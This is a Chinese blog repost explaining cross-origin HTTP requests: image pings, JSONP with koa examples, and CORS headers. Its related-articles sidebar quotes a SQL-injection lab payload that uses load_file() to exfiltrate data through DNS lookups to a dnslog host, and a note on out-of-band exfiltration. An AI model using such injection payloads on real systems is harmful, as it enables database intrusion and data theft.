跨域HTTP请求解决方案

最新推荐文章于 2023-09-01 13:58:20 发布
最新推荐文章于 2023-09-01 13:58:20 发布
阅读量76 收藏
点赞数
原文链接:https://segmentfault.com/a/1190000011968675
版权

持续更新地址:http://jaylin.wang/2017/cross...

跨域HTTP请求是指当前文档访问其他源提供的资源。两个页面具有相同的协议,域名和端口,则两个页面属于相同的源,不同子域名之间也属于不同的源。这是浏览器端的同源策略的约束,同源策略则是浏览器隔离潜在恶意文件的安全机制。

目前常用的跨域解决方案有EmbedPing、JSONP、CORS。

一些知识点

  1. 跨域限制是浏览器的一种行为

    当我们在浏览器的一个页面中尝试进行一次跨域操作,比如我们在 localhost 的一个页面通过 ajax 访问 127.0.0.1 的一个路由,127.0.0.1已经将数据返回给浏览器,浏览器禁止了获取响应数据行为。我们可以看一张图:

    跨越请求现象

  2. 跨域请求的几种方式

    • 跨域写
      浏览器始终支持通过跨域写操作。例如通过表单提交方式向其他源提交数据,点击链接重定向到其他源。

    • 跨域嵌入
      浏览器始终支持跨域资源的嵌入。例如通过 img、script、video 等元素的 src 属性嵌入跨域资源。

    • 跨域读

跨域的解决方案

EmbedPing

这是我自己瞎取的一个名字,大致是利用浏览器支持标签嵌入跨域属性实现的一种方案。img、script、link[rel='stylesheet']会在页面渲染过程中请求其src/href设置的资源地址,我们可以在访问的路由中做处理。例如使用img的src属性:

  <script>
    var img = new Image()
    img.src = 'http://localhost:4000/check'
  </script>

因为无法获取到服务端返回的数据,EmbedPing是浏览器向服务器单向请求的过程。

我们可以使用 EmbedPing 做一些不严格统计。

JSONP

JSONP也利用了 script 标签的 src 属性,浏览器会执行加载成功后的js。JSONP的局限是只能发送一个GET请求。

应用示例

看一个简单示例,我们希望在当前域的页面上打印服务器的一个状态,我们使用JSONP可以这样实现,前可以看一段简单代码(服务端使用koa构建的):

当前域属于 http://localhost:3000,我们在页面上这请求

<body>
  <script>
    var script = document.createElement('script')
    script.src = 'http://localhost:4000/jsonp/run'
    script.async = true
    document.body.appendChild(script)
  </script>
</body>

http://localhost:4000/jsonp/run 中,我们返回了一段打印状态的script

var valForServerB = 'a'
router.get('/jsonp/run', (ctx) => {
  let script = `
    alert('我来自服务器b,我的值是${valForServerB}')
  `
  ctx.body = script
})

这样,我们可以在当前页面上显示 valForServerB 的值了。

几种类型

根据 JSONP 返回的代码片段不同,混入自己的情感,我将 JSONP 分为三种类型(这种带着情感的划分,需要各位大牛的指正):

  • 返回执行
    返回代码即执行代码,直接在页面上产生效果

  • 返回定义
    返回代码是函数的定义,具体调用时机交给当前页面决定

  • 返回调用
    函数的执行过程是在页面上所定义的,JSONP的返回只是函数的调用,当然包含传给函数的参数。

为了保持当前页面的的绝对控制权,返回调用应该是应用最广的

错误处理

JSONP使用过程中,会有两种常见错误:

  • 请求失败或服务器返回失败
    捕获此类错误,我们是借用 script 的 onerror 处理

  • 服务器返回内容错误
    针对这类错误,我们会在当前页面借用定时器去处理。在返回调用时,我们可以在页面上的函数定义中埋下时间因子;在返回定义时,我们可以设置时间点去检测期望调用的方法是否存在。当然,此方法会因为网络等因素变得不可靠。

CORS(跨域资源共享)

CORS是当前页面与其他域执行的一种双方约束,需要浏览器应用和服务器程序之间的协调。

我们在服务器端可以通过设置CORS响应头部:

  • Access-Control-Allow-Origin: <origin> | *
    允许访问的源

  • Access-Control-Allow-Methods
    允许访问的方法

  • Access-Control-Allow-Headers
    运行添加的请求头部

  • Access-Control-Expose-Headers
    允许客户端可以访问的头部

  • Access-Control-Max-Age
    预请求的缓存周期

  • Access-Control-Allow-Credentials
    是否运行请求加入用户凭证信息

相应的,在请求头部中,我们可以加入:

  • Origin
    告知服务器请求的源

  • Access-Control-Request-Method
    告知服务器使用请求的的方法

  • Access-Control-Request-Headers
    告知服务器,请求中携带的头部

结语

跨域请求好,安全第一位。在我们跨域请求时,我们要确保我们请求的服务器返回的数据是可信任的。

相关链接

cross-origin-resolve-demo

MDN CORS

weixin_33806509
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入——dns的带外注入
cxrpty的博客
02-10 3630
以sql labs8为例 1.搜索dns.log在线软件,并get一个域名 2.在cmd中ping该域名,发现解析成功 3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行 4.在dn...
Http--跨域请求
BtWangZhi的博客
06-07 8050
在浏览器中,与当前页面不同域名的url是不允许访问的,这是浏览器端的限制,后端设置Access-Control-Allow-Origin为发起发的URL即可,相当于开放给这个URL请求(注意,必须要和浏览器中的URl相同,如请求方为127.0.0.1,Access-Control-Allow-Origin设置为localhost是不行的) 如果是允许多个URL请求,可以在Request中获取URL...
跨域发送HTTP请求详解
Qgee2013的博客
07-04 357
------------吾亦无他,唯手熟尔,谦卑若愚,好学若饥------------- 本篇博客讲述几种跨域HTTP请求的几种方法,POST请求,GET请求 目录: 一,采用JsonP的方式(只能是GET) 二,采用CROS的方式(需要在接收的一端也有配置) 三,采用form表单的方式(有些时候会存在问题,一会详细说明) 四,采用...
dns带外查询(cloudeye.me的使用)
一个码农的笔记
11-23 1万+
一些操蛋盲注可以用dns的带外查询来解决了,而且有了cloudeye这个神器就可以愉快的解决: 说明: 我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库的信息带出来 比如:ping test.xxx
记一次紧急安全事件:请求带外攻击(OOB)域名
最新发布
可乐要加冰!!!
09-01 1228
记一次紧急安全事件:请求带外攻击(OOB)域名
HTTP之跨域请求
weixin_30846599的博客
02-23 133
HTTP协议本身是没有跨域请求的设置的,跨域请求的限制是浏览器为了安全考虑加上去的。 实际上,浏览器对于HTTP请求是直接发送给server 浏览器提供了2种方式来突破跨域请求的限制, 在sever返回的Response Head中添加Access-Control-Allow-Origin 浏览器不限制script标签、img标签、link标签的跨域请求。 对于现在的突破跨域请求...
Tomcat跨域请求资源解决方案.zip
10-10
默认情况下,由于同源策略的限制,浏览器不允许JavaScript代码向不同的域名发送HTTP请求,这便是所谓的“跨域”问题。然而,为了解决这个问题,开发者可以利用CORS机制,通过在服务器端设置相应的响应头来放宽同源...
Vue跨域请求问题解决方案过程解析
11-19
在开发Web应用时,尤其是使用前端框架如Vue.js时,我们常常会遇到跨域问题,这是因为浏览器的安全策略限制了不同源的HTTP请求。本篇文章将详细介绍如何解决Vue项目中的跨域请求问题,主要通过配置Vue的开发服务器...
简单了解django处理跨域请求最佳解决方案
09-17
标题中的“简单了解django处理跨域请求最佳解决方案”是指在Django框架中处理来自不同源的HTTP请求,即跨域请求的问题。这个问题通常出现在前端应用(如JavaScript)尝试与不同域名、协议或端口的服务器进行通信时,...
PHP Ajax跨域问题解决方案代码实例
01-19
本文通过设置Access-Control-Allow-Origin来实现跨域。 例如:客户端的域名是client.runoob.com,而请求的域名是server.runoob.com。 如果直接使用ajax访问,会有以下错误: XMLHttpRequest cannot load ...
DNS域名解析服务
weixin_51099370的博客
04-14 1811
文章目录前言一、BIND域名服务基础1、DNS概念DNS使用的协议及端口号常用域名后缀2、DNS系统的作用及类型3、正向解析查询过程查询方式递归查询迭代查询二、DNS系统类型1、构建缓存域名服务器缓存域名服务器2、构建主从域名服务器2.1主域名服务器2.2从域名服务器三、BIND的安装和配置文件1、主配置文件named.conf 2-1全局配置部分2、BIND软件安装BIND (Berkeley Internet Name Daemon)相关软件包3、BIND服务BIND服务器端程序总结 前言 我们访问网
HTTP请求跨域
David_bdqn的博客
11-11 4911
浏览器发出一个请求到收到响应经历了哪些步骤 1、浏览器解析用户输入的URL,生成一个HTTP格式的请求; 2、先根据URL域名从本地hosts文件查找是否有映射IP,如果没有就将域名发送给电脑配置的DNS进行域名解析,得到IP地址; 3、浏览器通过操作系统将请求通过四层网络协议发送出去; 4、途中可能会经过各种路由器、交换机,最终到达服务器; 5、服务器接收到请求后,根据请求所指定的端口,将请求传递给绑定了该端口的应用程序,如tomcat; 6、tomcat接收请求数据后,按照http协议的格式
chrome浏览器拦截(block)特定网站某些请求的方法
热门推荐
薛定喵君的博客
07-26 1万+
介绍一下在浏览器中拦截特定网络请求的方法,比较实用???? 最近遇到了一个需求,需要在一个系统里面点击某些按钮的时候不要触发某个请求(例如操作日志) 正好Chrome浏览器就可以很好地满足这一愿望,仅需安装一个扩展(Extension)程序----"Request blocker" # 获取途径 ①谷歌扩展商店获取:https://chrome.google.com/webstore/detail/h...
PHP—— 跨域 HTTP 请求
xpisme
08-17 831
如果你需要从不同的服务器(不同域名)上获取数据就需要使用跨域 HTTP 请求。跨域请求在网页上非常常见。很多网页从不同服务器上载入 CSS, 图片,Js脚本等。在现代浏览器中,为了数据的安全,所有请求被严格限制在同一域名下,如果需要调用不同站点的数据,需要通过跨域来解决。以下的 PHP 代码运行使用的网站进行跨域访问。header("Access-Control-Allow-Origin: *");
任意二级域名http请求转https请求
bigwood99的博客
01-30 3011
有个网友的领导要求输入任意url(http的),自动转对应域名的https服务。 他的配置大致如下: 网友补充说,server_name设置为“*.bccxxxx.com”就不行了,单一域名是可以的。 很久没配置nginx,有点手痒犯贱。好吧搞下试试! 配置一个测试环境,server_name配置为“*.bccxxx.com” 测试地址如下:http://mmm.bccxxx.com...
解决http请求跨域问题
T_james的博客
08-03 1万+
      一个众所周知的问题,Ajax直接请求普通文件存在跨域无权限访问的问题,甭管你是静态页面、动态网页、web服务、WCF,只要是跨域请求,一律不准。在接口方面涉及到浏览器访问其他项目时也会碰到跨域问题,这个时候我们就要去解决它。        了解下什么是跨域?        概念:只要协议、域名、端口有任何一个不同,都被当作是不同的域。 URL ...
在Nginx服务器上配置域名完成HTTP请求(前端)
xuexi_gan的博客
12-27 2146
Nginx也可配置多个前端项目,Nginx可以通过端口号进行转发,也可对域名也就是server_name进行转发,如果你想在同一个服务器上配置多个前端项目,可直接复制80端口,更改域名也就是server_name 配置域名发送HTTP请求比较简单: 必要条件你需要申请一个域名 这里我用的事阿里云域名,首先去阿里云域名管理给自己的一级域名解析一个二级域名(因为我这里的一级域名已经用到了别的地方). 解析域名:xxx.一级域名名称 进入Nginx配置文件 server { lis
跨域引发的Web安全思考
weixin_33819479的博客
04-15 692
面试时常会出现跨域的解决方式,那么从为什么会产生跨域思考,就会有很多相关的知识跳出来了。也会帮助把以前不相关的知识点串联起来。 web 浏览器中包含javascript解释器,也就是说,一旦载入Web页面,就可以让任意的JavaScript代码在计算机里执行。这就造成了很大的安全隐患。攻击者可能会读取或修改数据、盗取隐私等。 基础安全知识 XSS (Cross Site Scripting, ...
详解HTTP跨域
summer_fish的专栏
08-06 6070
什么是跨域 所谓跨域,全称是 跨源资源共享 (CORS) Cross- Origin Resource Sharing ,是一种基于 HTTP Header 的机制,该机制通过允许服务器标示除了它自己以外的其它 origin(域,协议和端口),这样浏览器可以访问加载这些资源。 举个例子 运行在domain-a.com的 JavaScript 代码使用XMLHttpRequest分别发起两个请求: 请求A: https://domain-a.com/query 请求B: https://do...
Ajax跨域解决方案:JSONP、CORS与代理请求
本文主要探讨了Ajax跨域问题及其解决方案,包括JSONP、CORS和代理请求三种方式,并介绍了如何分析和识别Ajax跨域问题。 ### 什么是Ajax跨域 Ajax跨域是由于浏览器的“同源策略”限制,使得JavaScript在发送Ajax请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值